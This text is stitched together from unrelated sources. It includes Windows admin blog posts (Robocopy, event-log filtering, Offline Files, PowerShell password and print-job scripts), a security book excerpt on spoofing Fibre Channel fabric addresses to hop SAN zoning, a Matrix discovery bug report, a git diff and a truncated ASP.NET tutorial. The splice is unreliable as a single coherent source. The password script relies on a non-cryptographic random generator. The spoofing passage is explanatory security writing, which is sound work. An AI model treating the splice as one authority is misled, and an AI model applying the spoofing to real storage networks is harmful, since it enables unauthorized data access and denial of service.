Robocopy file classes

This information comes from the Robocopy.exe documentation PDF file for the Windows XP version, but it's the best description I've been able to find. From page 15 of that document:

Using Robocopy File Classes

For each directory processed, Robocopy constructs a list of files in both the source and destination directories. This list matches the files specified on the command line for copying. Robocopy then cross-references the lists, determining where files exist and comparing file times and sizes. The program places each selected file in one of the following classes.

File Class   In source    In destination   Source/dest file times   Source/dest file sizes   Source/dest attributes
Lonely       Yes          No               n/a                      n/a                      n/a
Tweaked      Yes          Yes              Equal                    Equal                    Different
Same         Yes          Yes              Equal                    Equal                    Equal
Changed      Yes          Yes              Equal                    Different                n/a
Newer        Yes          Yes              Source > Destination     n/a                      n/a
Older        Yes          Yes              Source < Destination     n/a                      n/a
Extra        No           Yes              n/a                      n/a                      n/a
Mismatched   Yes (file)   Yes (directory)  n/a                      n/a                      n/a

By default, Changed, Newer, and Older files are candidates for copying (subject to further filtering, as described later). Same files are not copied. Extra and Mismatched files and directories are only reported in the output log. Normally, Tweaked files are neither identified nor copied – they are usually identified as Same files by default. Only when /IT is used will the distinction between Same and Tweaked files be made, and only then will Tweaked files be copied.

Readable System Event logs

I think I'm not alone in finding that the Service Control Manager logs so many informational events that it becomes hard to pick out the important entries in the System Event logs on modern Windows systems. I've used custom XPath queries of Event logs before, and decided to define a Custom View of the System event log that suppresses the events generated by the Service Control Manager that are in the Informational or Verbose categories. Here's the XML that defines this custom view:

<QueryList>
  <Query Id="0" Path="System">
    <Select Path="System">*</Select>
    <Suppress Path="System">*[System[Provider[@Name='Service Control Manager'] and (Level=4 or Level=0 or Level=5)]]</Suppress>
  </Query>
</QueryList>

Renaming directories with invalid names

Somehow, a client managed to create several directories with names that ended with a period. However, File Explorer and other tools (e.g., backup) are unable to access the folder contents, getting an error that is usually interpreted as "The system cannot find the file specified." According to KB2829981, the Win32 API is supposed to remove trailing space and period characters. KB320081 has some helpful suggestions, and also indicates that some techniques allow programs to bypass the filename validation checks, and that some POSIX tools are not subject to these checks.

I found that I was able to delete these problem folders by using:

rmdir /q /s "\\?\J:\path\to\bad\folder."

But I wanted to rename the folders in order to preserve any content. After flailing about for a while, including attempts to modify the folders using a MacOS client and a third-party SSH service on the host, I was prodded by my colleague Greg to look at Robocopy. In the end, my solution was this:

1. I enabled 8dot3 file name creation on a separate recovery volume (I didn't want to do so on the multi-terabyte source volume)
2. Using Robocopy, I duplicated the parent folder containing the invalid folder names to the recovery volume, resulting in the creation of 8dot3 names for all the folders
3. I listed the 8dot3 names of the problem folders with dir /x
4. I ran the rename command with the short name as the source and a valid new name

This fixed the folders, and let me access their contents. I then deleted the invalid folders from the source and copied the renamed folders into place. It seems like a simple process, but I managed to waste most of a morning figuring this out. Hopefully, this may save someone else some time.
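Condensed into commands, the procedure looks roughly like this. It is a sketch, not a transcript: the drive letters, paths, and folder names are placeholders, and you should verify the per-volume 8dot3 syntax with fsutil 8dot3name /? on your build before relying on it.

:: 1. Enable 8dot3 name creation on the recovery volume only (R:)
fsutil 8dot3name set R: 0

:: 2. Duplicate the parent folder; short names are generated on R: as folders are created
robocopy "\\?\J:\data\parent" "R:\recovery\parent" /E /COPYALL

:: 3. List the generated short names
dir /x R:\recovery\parent

:: 4. Rename using the short name as the source
ren "R:\recovery\parent\BADFOL~1" "GoodFolderName"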
Troubleshooting Offline Files

My previous post describes the normal operation of Offline Files. And most of the time, "it just works." But there are times when it won't, and getting it running again can be challenging.

Two important concepts

First, it's important to understand that the Offline Files facility provides a virtual view of the network folder to which Documents has been redirected when Windows detects that the network folder is unavailable. This means that, when Offline Files is really borked, users can see different things in their Documents folder depending on whether their computers are online or offline.

Second, Windows treats different names for the same actual server as if they were different servers altogether. Specifically, Windows will only provide the Offline Files virtual view for the path to the target network folder. You can see the target folder path in the Properties of the Documents folder: the Location tab shows the UNC path to the target network folder.

For example, these two UNC paths resolve to the same network folder:

\\files.uvm.edu\rallycat\MyDocs
\\winfiles1.campus.ad.uvm.edu\rallycat\MyDocs

If the second path is the one that is shown in the Location tab in the properties of the Documents folder, then you will be able to access that path while offline, but not the first path.

Show me the logs

There are event logs that can be examined. I'll mention them, but I've rarely found them helpful in solving a persistent problem. If you want to get the client up and running again ASAP, skip ahead to the Fix it section.

There are some logging options available that can help in diagnosing problems with Offline Files. Two logs are normally visible in the Windows Event Viewer, under the Applications and Services Logs heading (a PowerShell snippet for pulling them follows this list):

• Microsoft-Windows-Folder Redirection/Operational
• Microsoft-Windows-OfflineFiles/Operational
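If you'd rather pull those logs with PowerShell than click through the Event Viewer, something like this should work (log names exactly as listed above):

Get-WinEvent -LogName 'Microsoft-Windows-Folder Redirection/Operational' -MaxEvents 50 |
    Format-Table TimeCreated, Id, LevelDisplayName, Message -AutoSize

Get-WinEvent -LogName 'Microsoft-Windows-OfflineFiles/Operational' -MaxEvents 50 |
    Format-Table TimeCreated, Id, LevelDisplayName, Message -AutoSize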
Folder Redirection and Offline Files

The following information is not new. We are in the process of making changes to our Folder Redirection policy, though, and I thought it might be helpful to have this baseline information in a place that is handy for referral.

Background

Offline Files is a feature of Windows that was introduced in parallel with Folder Redirection in Windows 2000. Folder Redirection allows an administrator to relocate some of the user profile data folders to a network folder, which has the advantage of protecting that data from loss due to workstation issues like drive failure, malware infection, or theft. It also means you can access your data from multiple workstations. The Offline Files facility provides a local cache of the redirected folder(s) so that mobile users can continue to work with the data in those folders when disconnected from the organization's network. When the computer is connected to the network again, any changes to either the network folder or the local Offline Files cache are synchronized. Users are prompted to resolve any conflicting changes, e.g., the same file was modified in both places, or was deleted from one and modified in the other.

At UVM, we use Folder Redirection on the Documents folder (formerly My Documents in XP), as well as the Pictures, Video, and Music folders.

Most of the time, the Offline Files facility works without issue. However, as with all technology, Offline Files can fail. There are circumstances that can result in the corruption of the database that Offline Files uses to track the sync status of files. Doing major reorganizing and renaming of files and folders, for example, seems to be a culprit. Another one is filling your quota; you can continue to save files to your local cache, but the files won't get synced to the server because you're out of space.

How to sync your offline files

To manually synchronize your Offline Files with the target network folder, open the Sync Center by:

1. Going to the Start Screen (or menu) and typing sync center
2. Clicking the Sync Center item in the search results

Windows 8.1 Start search for "sync center"
Windows 7 Start search for "sync center"

or

1. Finding the Sync Center tray icon and double-clicking it, or
2. Right-clicking it and selecting the Open Sync Center menu item

Menu for the Sync Center icon in the Windows system tray.

The Sync Center window should appear.

Offline Files status in Sync Center

Note that the Offline Files item shows the time of the most recent sync operation. If you want to initiate a sync operation, click Offline Files and then click Sync.

A sync operation has completed.

If there are errors or conflicts that require intervention to resolve, those will be shown in the result. A conflict result is shown below.

Sync operation with a conflict.

Click the N Conflicts link or View sync conflicts on the left to see details about the files in conflict.

Right-click or select and click 'Resolve'.

Select each file conflict you want to resolve, and click Resolve, or right-click the file and select View options to resolve…

Windows provides information about the files in conflict and provides several appropriate options.

In this scenario, a file has been deleted in one location, and modified while offline in the other. Since only the one file exists, there are only two options: delete the file, or copy it to both locations. Another scenario involves a file having been modified both offline and online, probably while using multiple computers. In that case, the resolution window offers three choices: pick the offline file (on this computer), pick the online version (on the network folder), or keep both by renaming one of them.

Sync errors are handled differently, and may require the help of your IT support staff or the UVM Tech Team.

A sync operation with error.

To review the errors or conflicts, you can view the Sync Results.
Sync result, with detail for an error. You can view details about an individual error by hovering over it with the mouse cursor. In the example above, my folder “2. Archive” is throwing an “Access is denied” error. To resolve an error like this, it may be necessary to contact the Tech Team. In some cases, it’s necessary to reset the Offline Files tracking database and essentially start over. This procedure is documented in a separate post, Troubleshooting Offline Files. PowerShell Script: New-RandomString.ps1 I need to automate the setting of passwords on some Active Directory accounts. Since resetting passwords is also a task that I’m asked to perform with some routine, I decided to make a more generic tool script that could be used in a variety of tasks ( I listened to Don Jones‘ advice on building Tools and Controllers). I also got a head start from Bill Stewart’s useful Windows IT Pro article Generating Random Passwords in PowerShell.  Among the changes I made are source character class handling, and a new SecureString output option. Please let me know if you find the script useful, or if you find any bugs. <# .SYNOPSIS Generates one or more randomized strings containing specified character classes. .PARAMETER Length The length of the string to be generated. .PARAMETER CharacterClasses An array of Character Classes from which to generate the string. The string will contain at least one character from each specificied class. You may also use the alias 'Classes' for the parameter name Valid Character classes are: Upper - A..Z Lower - a..z Digits - 0..9 AlphaNum - shorthand for Upper,Lower,Digits Symbols - !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ Safe - #$%+-./:=\_~ (ODBC Safe, Shell Safe if quoted) If no classes are specified, a string is generated with mixed-case letters, digits, and symbol characters (i.e., ALL the classes). .PARAMETER IncludeCharacters A string of characters to include in the generated string: .PARAMETER ExcludeCharacters A string a characters to exclude in the generated string: .PARAMETER Count The number of strings to be generated. .PARAMETER AsSecureString Specifies that the new random string(s) will be returned as Secure String objects, to make their use as passwords easier. .EXAMPLE > New-RandomString.ps1 -CharacterClasses Lower,Digits -Length 14 -Count 5 Generated five strings, each fourteen characters long, comprised of lowercase letters and digits. .EXAMPLE > New-RandomString.ps1 -Classes AlphaNum,Symbols -length 21 > New-RandomString.ps1 -length 21 The previous two commands are equivalent, because the default character classes used are upper and lowercase letters, digits, and symbol characters. .EXAMPLE > New-RandomString.ps1 -Class 'AlphaNum' -Include '#$%^' The generated string will contain characters from the UpperCase, LowerCase and Digits classes, as well as at least one character from among the four specified. .EXAMPLE > New-RandomString.ps1 -Class 'AlphaNum' -Exclude 'O0l1' The generated string will contain characters from the UpperCase, LowerCase and Digits classes, but will not contain the "look-alike' characters. 
.Notes Author : Geoff Duke <[email protected]> Last Edit : 2014-11-07 Based on script "Get-RandomString.ps1" for Windows IT Pro: http://windowsitpro.com/powershell/generating-random-passwords-powershell #> #Requires -version 3 [cmdletbinding()] Param( [alias('Size')] [ValidateRange(7,256)] [int] $length = 21, [int] $count = 1, [Parameter()] [ValidateSet('Upper','Lower','Digits','AlphaNum','Symbols','Safe')] [alias('Classes')] [String[]] $CharacterClasses = @('Upper','Lower','Digits','Symbols'), [Parameter()] [string] $IncludeCharacters = '', [string] $ExcludeCharacters = '', [switch] $AsSecureString ) Set-StrictMode -version 'Latest' # Additional parameter wrangling # -------------------------------------------------------------------- [string[]] $Classes = $CharacterClasses.ToLower() if ( $Classes.Contains('safe') -and $Classes.Contains('symbols') ) { write-warning 'You specified both "Symbols" and "Safe" character classes; this is the same as just specifying "Symbols".' $Classes = $Classes | where { $_ -ne 'safe' } } # Replace alphanum with the upper,lower, and digits classes if ( $Classes.Contains('alphanum') ) { $Classes = $Classes | where { $_ -ne 'alphanum' } $Classes += 'upper','lower','digits' } # remove any duplicated classes $Classes = $Classes | select -unique # Setup source characters # -------------------------------------------------------------------- # Character classes - functionally, a strongly-typed hash of string arrays # (addresses issue of singleton arrays turning into simple strings) $chars = New-Object 'Collections.Generic.Dictionary[string,char[]]' $chars['lower'] = 97..122 | foreach-object { [Char] $_ } $chars['upper'] = 65..90 | foreach-object { [Char] $_ } $chars['digits'] = 48..57 | foreach-object { [Char] $_ } $chars['symbols'] = (33..47+58..64+91..96+123..126) | foreach-object { [Char] $_ } $chars['safe'] = '#$%+-./:=\_~'.ToCharArray() write-verbose $( 'String must include a character from each of ' + $( $Classes -join ',' ) + $( if ( $IncludeCharacters ) { " plus [$IncludeCharacters] " } ) + $( if ( $ExcludeCharacters ) { "but must not include any of [$ExcludeCharacters]" } ) ) if ( $IncludeCharacters ) { $Classes += 'include' $chars['include'] = $IncludeCharacters.ToCharArray() } [char[]] $char_source = $chars[ $Classes ] | % { $_ } | select -unique if ( $ExcludeCharacters ) { $char_source = $char_source | Where { $_ -NotIn $ExcludeCharacters.ToCharArray() } } write-verbose "Source chars: $(-join $char_source)" # Generating the random string(s) # -------------------------------------------------------------------- $string_count = 0 :NewString while ( $string_count -lt $Count ) { $output = '' for ( $i=0; $i -lt $length; $i++) { $output += get-random @($char_source) } write-debug "NewString: generated string is -> $output" # Ensure that the requested character classes are present :CharClass foreach ($class in $Classes) { foreach ( $char in $output.ToCharArray() ) { if ( $chars[$class] -Ccontains $char ) { write-debug "CharClass: '$char' is in $class" continue CharClass # check the next character class } } # end foreach $char, didn't match the current character class write-debug "CharClass: No character from $class! Start again" continue NewString # Need to generate a new string } # end foreach #class # string matches required character classes" $string_count++ if ( $AsSecureString ) { ConvertTo-SecureString $output -AsPlainText -Force } else { $output } } # end while It was while I was writing this script that I ran into the Loop Label documentation error. 
In PowerShell, as in Perl, Loop Labels do not include the colon when used with a break or continue statement. PowerShell documentation error – loop labels I’ve been banging my head on a problem with a script I’m writing. I want to stop executing an inner loop and resume with the next iteration of an outer loop. In Perl, I’d use a next statement with a loop label. In PowerShell, the analogous statement is continue, and loop labels are supported, as described in the about_Break help document. I finally wrote simplified test code, following the documentation carefully. However, the documentation is wrong. It indicates that the break or continue statement should include the colon in the loop label. This doesn’t throw an error, but it executes as though the label isn’t present at all. The code below includes the colon. $VerbosePreference = 'Continue' write-warning 'There should be no output; the outer loop should be exited during first iteration' :outer foreach ($a in ('red','green') ) { write-verbose "Outer loop" :inner foreach ($b in ('red','blue','green') ) { write-verbose "Inner loop" write-verbose "`$a is $a ; `$b is $b" if ( $a -eq $b ) { break :outer } "$a $b" } } Then cracked my copy of PowerShell in Action and saw that the loop label does not include the colon, just like Perl. Remove the colon and everything is good. Wish it hadn’t taken me hours to work it out.   Get-PrintJobs.ps1 PowerShell script After a recent upgrade of our print servers, I discovered that the Print Spooler service event logging had been enhanced, and changed enough that some PowerShell reporting scripts that worked just fine on Windows Server 2008 (32-bit) no longer worked on Server 2012 R2. To get the reports working again, I had to enable the Microsoft-Windows-PrintService/Operational log. I also had to increase the log size from the default in order to retain more than one day’s events. The trickiest part was figuring out the XPath query syntax for retrieving events from a particular printer. The newer syntax makes more sense to me, but it took me a long time to arrive at it. Following Don Jones‘ entreaty to build tools and controllers, I offer this tool script, which retrieves (simplified) print job events, and cares not a whit about formatting or saving. <# .SYNOPSIS Gets successful print job events and returns simplified objects with relevant details. .DESCRIPTION Collects the successful print jobs from the PrintService Operational log, with optional query parameters including Printer name and start and end times. .PARAMETER PrinterName The share name of the printer for which events will be retrieved. .PARAMETER StartTime The beginning of the interval during which events will be retrieved. .PARAMETER EndTime The end of the interval during which events will be retrieved. .EXAMPLE C:\> Get-PrintJobs.ps1 Returns objects representing all the successful print jobs (events with id 307). .EXAMPLE C:\> Get-PrintJobs.ps1 -PrinterName 'Accounting HP LaserJet' Returns objects for all the jobs on the Accounting printer. .EXAMPLE C:\> Get-PrintJobs.ps1 -PrinterName 'Accounting HP LaserJet' -StartTime (Get-Date).AddHours(-12) Returns objects for all the jobs on the Accounting printer generated in the last twelve hours. .NOTES Script Name: Get-PrintJobs.ps1 Author : Geoff Duke <[email protected]> Edit 2014-10-08: Generalizing from dept printer report script, fixing XPath query syntax. Edit 2012-11-29: Job is run as SYSTEM, and computer object has been granted Modify rights to the destination directory. 
#> Param( [string] $PrinterName, [datetime] $StartTime, [datetime] $EndTime ) Set-StrictMode -version latest # Building XPath query to select the right events $filter_start = @' <QueryList> <Query Id="0" Path="Microsoft-Windows-PrintService/Operational"> <Select Path="Microsoft-Windows-PrintService/Operational"> '@ $filter_end = @' </Select> </Query> </QueryList> '@ $filter_match = '*[System[(EventID=307)' #need to add ']]' to close if ( $StartTime -or $EndTime) { $filter_match += ' and TimeCreated[' #need to add ']' to close $time_conds = @() if ( $StartTime ) { $time_conds += ( '@SystemTime&gt;=' + "'{0:yyyy-MM-ddTHH:mm:ss.000Z}'" -f $StartTime.ToUniversalTime() ) } if ( $EndTime ) { $time_conds += ( '@SystemTime&lt;=' + "'{0:yyyy-MM-ddTHH:mm:ss.000Z}'" -f $EndTime.ToUniversalTime() ) } $filter_match += ( $time_conds -join ' and ' ) + ' ]' # Closing TimeCreated[ } $filter_match += "]]`n" # Closing [System[ if ( $PrinterName ) { $filter_match += @" and *[UserData[DocumentPrinted[(Param5='$PrinterName')]]] "@ } write-debug "Using Filter:`n $filter_match" # The $filter variable below is cast as XML, that's getting munged # by WordPress or the SyntaxHighlighter as '1' $filter = ($filter_start + $filter_match + $filter_end) get-winevent -filterXML $filter | foreach { $Properties = @{ 'Time' = $_.TimeCreated; 'Printer' = $_.Properties[4].value; 'ClientIP' = $_.properties[3].value.SubString(2); 'User' = $_.properties[2].value; 'Pages' = [int] $_.properties[7].value; 'Size' = [int] $_.properties[6].value } New-Object PsObject -Property $Properties } If you find this script useful, please let me know. If you find any bugs, definitely let me know!
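In the tools-and-controllers spirit, a quick "controller" one-liner that consumes the tool might look like this (the printer name matches the help examples; the report path is a placeholder):

.\Get-PrintJobs.ps1 -PrinterName 'Accounting HP LaserJet' -StartTime (Get-Date).AddDays(-1) |
    Sort-Object Time |
    Export-Csv -Path 'C:\Reports\AccountingJobs.csv' -NoTypeInformation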
Fibre Channel address weaknesses Fibre Channel address weaknesses include manipulation of the 24-bit fabric address, which can cause significant damage and denial of service in a storage area network (SAN). Learn where the vulnerabilities lie in this excerpt from "Securing Storage: A Practical Guide to SAN and NAS Security." Fibre Channel address weaknesses Now that we have established that attacks don't change, but they do get modified, let's discuss another attack that stems network and application history. Manipulation of the 24-bit fabric address can cause significant damage and denial of service in a SAN. Each node in a SAN has a 24-bit fabric address that is used for routing, among other things. Along with routing frames correctly to/from their source and destinations, the 24-bit address is also used for name server information. The name server is a logical database in each Fibre Channel switch that correlates a node's 24-bit fabric address to their 64-bit WWN. Additionally, the name server is also responsible for other items, such as mapping the 24-bit fabric address and 64-bit WWN to the authorized LUNs in the SAN. Furthermore, address information is also used for soft and hard zoning procedures (discussed in the Chapter 4, "SANs: Zone and Switch Security"). The 24-bit fabric address of a node determines route functions with soft and hard zoning procedures, specifically if a frame is allowed to pass from one zone to the other. While there are several other uses of the 24-bit address, the use of the address in name servers and zoning procedures are by far the most important in terms of security. The major issues with the 24-bit address is that it is used for identification purposes for both name server information and soft/hard zone routing, almost like an authorization process, but it is an entity that can be easily spoofed. Using any traffic analyzer, the 24-bit source address of a Fibre Channel frame could be spoofed as it performs both PLOGI (Port Login) and FLOGI (Fabric Login) procedures. In Fibre Channel, there are three different types of login—Port Login, Fabric Login, and Node Login. Two can be corrupted with a spoofed 24-bit fabric address. Before we discuss how spoofing disrupts these processes, let's discuss the login types first. FABRIC LOGIN (FLOGI), PORT LOGIN (PLOGI), AND NODE LOGIN (NLOGI) The Fabric Login (FLOGI) process allows a node to log in to the fabric and receive an assigned address from a switch. The FLOGI occurs with any node (N_Port or NL_Port) that is attached to the fabric. The N_Port or NL_Port will carry out the FLOGI with a nearby switch. The node (N_Port or NL_Port) will send a FLOGI frame that contains its node name, its N_Port name, and any service parameters. When the node sends its information to the address of 0xFFFFFE, it uses the 24-bit source address of 0x000000 because it hasn't received a legitimate 24-bit address from the fabric yet. The FLOGI will be sent to the well-known fabric address of 0xFFFFFE, which is similar to the broadcast address in an IP network (though not the same). The FC switches and fabric will receive the FLOGI at the address of 0xFFFFFE. After a switch receives the FLOGI, it will give the N_Port or NL_Port a 24-bit address that pertains to the fabric itself. 
This 24-bit address will be in the form of a Domain-Area-Port address, where the Domain is the unique domain name (ID) of the fabric, Area is the unique area name (ID) of the switch within the domain, and Port is the unique name (ID) of each port within the switch in the fabric. Table 2.3 shows how the 24-bit address is made.

Table 2.3 24-Bit addresses

24-Bit Address Type   Description
8-bit domain name     Unique domain ID in a fabric. Valid domain IDs are between 1 and 239.
8-bit area name       Unique area ID on a switch within a fabric. Valid area IDs are between 0 and 255.
8-bit port name       Unique port ID on a switch within a fabric. Valid port IDs are between 0 and 255.

A 24-bit address (port ID) uses the following formula to determine a node's address:

Domain_ID x 65536 + Area_ID x 256 + Port_ID = 24-bit address

An example address for a node on the first domain (domain ID of 1), on the first switch (area ID of 0), and the first port (port ID of 1) would be the following:

1 x 65536 + 0 x 256 + 1 = 65537 (Hex: 0x10001)

After the node has completed the FLOGI and has a valid 24-bit fabric address, it will perform a Port Login (PLOGI) to the well-known address of 0xFFFFFC to register its new 24-bit address with the switch's name server, as well as submit information on its 64-bit port WWN, 64-bit node WWN, port type, and class of service. The switch then registers that 24-bit fabric address, along with all the other information submitted, to the name server and replicates that information to other name servers on the switch fabric. Figures 2.14 and 2.15 show the FLOGI and PLOGI processes.

Figure 2.14 FLOGI process.
Figure 2.15 PLOGI process.

A Node Login is somewhat similar to a Fabric Login, but instead of logging in to the fabric, the node logs in to another node directly (node-to-node communication). The node will not receive any information from the fabric, but will receive information from the other node as it relates to Exchange IDs (OX_ID and RX_ID) and session information (Seq_ID and Seq_CNT). After this information has been exchanged, the two nodes will begin to communicate with each other directly.

FLOGI, PLOGI, AND ADDRESS SPOOFING

Now that we have established the facts concerning FLOGI, PLOGI, and address spoofing, let's look at how these weaknesses interrelate. After performing the FLOGI process, an FC node needs to perform a PLOGI to the well-known address of 0xFFFFFC. The PLOGI then registers the 24-bit address of the node with the Name Server (also referred to as a Simple Name Server) of the switch. If an entity were to spoof its 24-bit fabric address and send it to the address of 0xFFFFFC, the switches would see a node performing a PLOGI. Once the switch receives the information from the PLOGI frame, it will register the spoofed 24-bit address of the node to the name server, thus polluting the name server with incorrect information. You might wonder what the big deal is, since the node has corrupted only its own information; however, consider the fact that the 24-bit address is used for hard and soft zoning. For example, let's say the 24-bit address of 65537 (Hex: 0x10001) is allowed to route to nodes in zone A, and no other addresses can access that zone. A malicious attacker has the address of 65541 (Hex: 0x10005) and cannot access that zone. The malicious attacker can spoof (change) their 24-bit address to match 65537 (0x10001) and then route frames to the restricted zone A, despite being unauthorized to do so.
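To make the address arithmetic concrete, here is a small Python sketch; the IDs match the zone A example above, and nothing in it comes from the book itself.

def fabric_address(domain_id, area_id, port_id):
    """Compose a 24-bit Fibre Channel fabric address (port ID)."""
    return domain_id * 65536 + area_id * 256 + port_id

authorized = fabric_address(1, 0, 1)   # 65537 -> 0x010001, allowed into zone A
attacker   = fabric_address(1, 0, 5)   # 65541 -> 0x010005, not allowed

print(hex(authorized), hex(attacker))
# Spoofing simply means the attacker writes 0x010001 into the source-address
# field of its frames; address-based zoning cannot tell the two nodes apart.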
Spoofing the 24-bit address during PLOGI negates any route-based zoning rules that may have been applied. The simple process of spoofing now creates the ability to route (hop) across hard and soft zoning rules. Figure 2.16 shows the FLOGI/PLOGI spoofing process.

Figure 2.16 FLOGI/PLOGI spoofing process.

We will take this idea a bit further in the next section, "Man-in-the-Middle Attacks," where I discuss the issues of spoofing the 24-bit fabric address and spoofing a node WWN. The fact is that this attack is very severe, breaking the integrity of any hard or soft zoning rules. However, a traffic analyzer is required to perform it, which creates barriers to carrying out the attack.

This chapter excerpt is from Securing Storage: A Practical Guide to SAN and NAS Security by Himanshu Dwivedi (Addison-Wesley).
Librem Chat: the librem.one webserver doesn't host the Client-Server API's well-known URI for server discovery

The domain part of all Matrix user IDs at Librem Chat's homeserver is librem.one, but the actual hostname of the homeserver is chat.librem.one instead. Therefore, the "Server Discovery" feature of Matrix is necessary for both clients and other homeservers to be able to find the correct hostname of any Librem Chat user's homeserver.

Currently, there is an SRV record named _matrix._tcp.librem.one present in the DNS, and its target is chat.librem.one. This makes the Server Discovery feature work correctly for other homeservers federating with Librem Chat's homeserver, according to the "Resolving server names" section (i.e. section 2.1) of Matrix's Server-Server API specification.

By contrast with the Server-Server API, though, the "Server Discovery" section (i.e. section 3) of Matrix's Client-Server API specification does not say that Matrix clients should use DNS SRV records for server-discovery purposes. (In fact, the Client-Server API specification doesn't mention SRV records at all.) Instead, it says that the /.well-known/matrix/client well-known URI should be used for client-to-server Server Discovery. However, the web server at librem.one isn't hosting anything at its /.well-known/matrix/client URL – i.e. you'll currently get a 404 Not Found error if you try to retrieve that URL.

Consequently, it's not possible for a Librem Chat user to log in using many/most Matrix client apps unless they manually enter both their user ID (whose domain part is librem.one) and the chat.librem.one hostname separately; otherwise, they'll get an error message, because the client will try to use librem.one (instead of chat.librem.one) as the hostname of the homeserver. (For example, nheko will give an error message that says "The required endpoints were not found. Possibly not a Matrix server." in this scenario, and the user will then need to manually enter chat.librem.one into the "Hostname" field on the login screen in order to log in successfully. Similarly, in SchildiChat, the user will not be able to log in to Librem Chat using the "Sign in with Matrix ID" option on the login screen; they'll need to use the "Custom server" option instead.)

Also, the web server at librem.one isn't hosting anything at its /.well-known/matrix/server well-known URI for server discovery by other homeservers, which is specified in the aforementioned part of Matrix's Server-Server API specification as an alternative to the use of a DNS SRV record. This currently doesn't cause any problems (because in the absence of that well-known URI, homeservers will "fall back" to using the DNS SRV record for server discovery instead), but someone in nheko's issue tracker warned that "Matrix Spec may be removing the entire SRV support" in the future (see MSC3922 – i.e. pull request 3922 in the matrix-org/matrix-spec-proposals repo on GitHub – for more details about this).

(Incidentally, the webserver at chat.librem.one actually does host the correct JSON data for server discovery at its /.well-known/matrix/client URL. But, because the domain part of all Matrix user IDs at Librem Chat's homeserver is librem.one rather than chat.librem.one, that URL won't be used by a Matrix client when a user whose user ID's domain is librem.one tries to log in.)

Random question: Would the Matrix client support and respect an HTTP redirect if librem.one redirected to the same path but on chat.librem.one?
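For reference, the payloads in question are tiny. Per the Matrix specs, librem.one would need to serve roughly the following (the base_url and port values here assume standard HTTPS on chat.librem.one).

At https://librem.one/.well-known/matrix/client:

{
  "m.homeserver": {
    "base_url": "https://chat.librem.one"
  }
}

And, for the Server-Server API alternative to the SRV record, at https://librem.one/.well-known/matrix/server:

{
  "m.server": "chat.librem.one:443"
}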
Commits

Anonymous committed f89ec34

Issue number: ww-997

git-svn-id: http://svn.opensymphony.com/svn/xwork/trunk@687 e221344d-f017-0410-9bd5-d282ab1896d7

src/java/com/opensymphony/xwork/validator/validators/VisitorFieldValidator.java

 /**
- * The VisitorFieldValidator allows you to forward validation to object
+ * <!-- START SNIPPET: javadoc -->
+ * <p>The VisitorFieldValidator allows you to forward validation to object
  * properties of your action using the object's own validation files. This
  * allows you to use the ModelDriven development pattern and manage your
  * validations for your models in one place, where they belong, next to your
  * model classes. The VisitorFieldValidator can handle either simple Object
- * properties, Collections of Objects, or Arrays.
+ * properties, Collections of Objects, or Arrays.</p>
+ * <!-- END SNIPPET: javadoc -->
+ *
+ *
+ * <!-- START SNIPPET: parameters -->
+ * <ul>
+ * <li>fieldName - field name if plain-validator syntax is used, not needed if field-validator syntax is used</li>
+ * <li>context - the context of which validation should take place. Optional</li>
+ * <li>appendPrefix - the prefix to be added to field. Optional </li>
+ * </ul>
+ * <!-- END SNIPPET: parameters -->
+ *
+ * <pre>
+ * <!-- START SNIPPET: example -->
+ * &lt;validators&gt;
+ * &lt;!-- Plain Validator Syntax --&gt;
+ * &lt;validator type="visitor"&gt;
+ * &lt;param name="fieldName"&gt;user&lt;/param&gt;
+ * &lt;param name="context"&gt;myContext&lt;/param&gt;
+ * &lt;param name="appendPrefix"&gt;true&lt;/param&gt;
+ * &lt;/validator&gt;
+ *
+ * &lt;!-- Field Validator Syntax --&gt;
+ * &lt;field name="user"&gt;
+ * &lt;field-validator type="visitor"&gt;
+ * &lt;param name="context"&gt;myContext&lt;/param&gt;
+ * &lt;param name="appendPrefix"&gt;true&lt;/param&gt;
+ * &lt;/field-validator&gt;
+ * &lt;/field&gt;
+ * &lt;/validators&gt;
+ * <!-- END SNIPPET: example -->
+ * </pre>
+ *
+ * <!-- START SNIPPET: explanation -->
+ * <p>In the example above, if the acion's getUser() method return User object, WebWork
+ * will look for User-myContext-validation.xml for the validators. Since appednPrefix is true,
+ * every field name will be prefixed with 'user' such that if the actual field name for 'name' is
+ * 'user.name' </p>
+ * <!-- END SNIPPET: explanation -->
+ *
+ *
  *
  * @author Jason Carreira
  * @author Rainer Hermanns
- * Created Aug 2, 2003 10:27:48 PM
+ * @version $Date$ $Id$
  */
 public class VisitorFieldValidator extends FieldValidatorSupport {
Click here to Skip to main content Click here to Skip to main content Go to top Understanding and Implementing Repository and Unit of Work Pattern in ASP.NET MVC Application , 12 Apr 2013 Rate this: Please Sign up or sign in to vote. In this article we will try to see what is Repository and Unit of Work Pattern in an ASP.NET MVC application. Introduction In this article we will try to see what is Repository and Unit of Work Pattern in an ASP.NET MVC application. We will also implement a small rudimentary sample application to understand the same. Background  Possibility of using ORMs in our application saves us from a lot of code that needs to be written in order to create our entities and data access logic. But using ORMs like entity framework sometimes lead to scattered data access logic/predicates in various place in code. Repository and Unit of work pattern provides a clean way to access data and at the same time maintain the test-ablility of the application. Let us try to understand this by implementing a simple ASP.NET MVC application. Using the code Let us first try to create a simple database on which we will be performing CRUD operations. We will define a simple tables in the database as: Now with the database/table in created, we will go ahead and generate the ADO.NET entity data Model for these tables in our application. The generated entities will look like: Performing Simple Data Access Now we have the entity framework ready to be used in our application. We can very well use the Context class in each controller to perform database operations. Let us try to see this by trying to retrieve the data in our Index action of HomeController. public ActionResult Index() { List<Book> books = null; using (SampleDatabaseEntities entities = new SampleDatabaseEntities()) { books = entities.Books.ToList(); } return View(books); } And when we try to run this application, we will see that it is getting the data from the database as: Note: We will not be doing other CRUD operations here because they can be done on same lines very easily. To visualize the above implementation:   Now there is nothing wrong from the code and functionality perspective in doing this. But there are two problems in this approach. 1. The Data access code is scattered across the application and this is a maintenance nightmare. 2. The Action in the Controller is creating the Context inside itself. This makes this function non testable using dummy data and we can never be able to verify the results unless we use test data. Note: If the second point is not clear then it is recommended to read about Test Driven Development using MVC. We cannot discuss it in this article otherwise the article will become digressing. Creating a Repository Now how can we solve the problem. We can solve the problem by moving all the data access code of entity framework in one place. So let us define a class that will contain all the data access logic for Books table. But before creating this class, let us also think about the second problem for an instance. If we create a simple interface defining the contract for accessing the books data and then implement this interface in our proposed class, we will have one benefit. We can then have another class implementing the same interface but playing around with the dummy data. Now as long as the controller is using the Interface our test projects can pass the dummy data class and our controller will not complain. So let us first define the contract for accessing books data. 
